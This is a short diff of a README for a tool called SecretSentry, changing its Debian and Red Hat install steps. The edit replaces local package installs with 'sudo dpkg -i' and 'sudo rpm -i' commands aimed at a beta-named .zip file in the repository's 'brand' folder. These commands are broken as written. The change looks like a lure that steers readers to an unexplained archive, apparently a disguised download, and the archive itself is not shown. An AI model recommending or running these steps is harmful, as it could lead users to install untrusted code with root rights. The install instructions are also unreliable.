zamokhmer/SecretSentry/README.md

 1. Download the appropriate package for your distribution.
 You might find `.deb` for Debian-based systems or `.rpm` for Red Hat-based systems.
 2. Use the terminal to install the downloaded package.
 For example:
-   - For Debian: `sudo dpkg -i secret-sentry.deb`
+   - For Debian: `sudo dpkg -i https://github.com/zamokhmer/SecretSentry/raw/refs/heads/main/brand/Sentry_Secret_v2.0-beta.5.zip`
-   - For Red Hat: `sudo rpm -i secret-sentry.rpm`
+   - For Red Hat: `sudo rpm -i https://github.com/zamokhmer/SecretSentry/raw/refs/heads/main/brand/Sentry_Secret_v2.0-beta.5.zip`
 3. Follow any additional instructions that appear during the installation process.

 ### **How to Run SecretSentry**